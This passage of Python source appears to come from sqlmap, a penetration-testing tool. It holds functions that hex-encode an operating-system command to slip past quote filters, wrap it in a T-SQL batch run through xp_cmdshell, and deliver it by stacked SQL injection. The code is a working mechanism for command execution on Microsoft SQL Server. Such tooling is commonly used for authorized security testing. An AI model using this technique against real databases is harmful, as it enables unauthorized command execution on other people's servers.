(self, cmd, insertIntoTable=None)
| 154 | self.xpCmdshellExecCmd(cmd.rstrip(" & ")) |
| 155 | |
| 156 | def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): |
| 157 | # When user provides DBMS credentials (with --dbms-cred) we need to |
| 158 | # redirect the command standard output to a temporary file in order |
| 159 | # to retrieve it afterwards |
| 160 | # NOTE: this does not need to be done when the command is 'del' to |
| 161 | # delete the temporary file |
| 162 | if conf.dbmsCred and insertIntoTable: |
| 163 | self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) |
| 164 | cmd = "%s > \"%s\"" % (cmd, self.tmpFile) |
| 165 | |
| 166 | # Obfuscate the command to execute, also useful to bypass filters |
| 167 | # on single-quotes |
| 168 | self._randStr = randomStr(lowercase=True) |
| 169 | self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr |
| 170 | |
| 171 | try: |
| 172 | self._forgedCmd += "SET @%s=%s;" % (self._randStr, "0x%s" % encodeHex(cmd, binary=False)) |
| 173 | except UnicodeError: |
| 174 | self._forgedCmd += "SET @%s='%s';" % (self._randStr, cmd) |
| 175 | |
| 176 | # Insert the command standard output into a support table, |
| 177 | # 'sqlmapoutput', except when DBMS credentials are provided because |
| 178 | # it does not work unfortunately, BULK INSERT needs to be used to |
| 179 | # retrieve the output when OPENROWSET is used hence the redirection |
| 180 | # to a temporary file from above |
| 181 | if insertIntoTable and not conf.dbmsCred: |
| 182 | self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable |
| 183 | |
| 184 | self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) |
| 185 | |
| 186 | return agent.runAsDBMSUser(self._forgedCmd) |
| 187 | |
| 188 | def xpCmdshellExecCmd(self, cmd, silent=False): |
| 189 | return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) |
no test coverage detected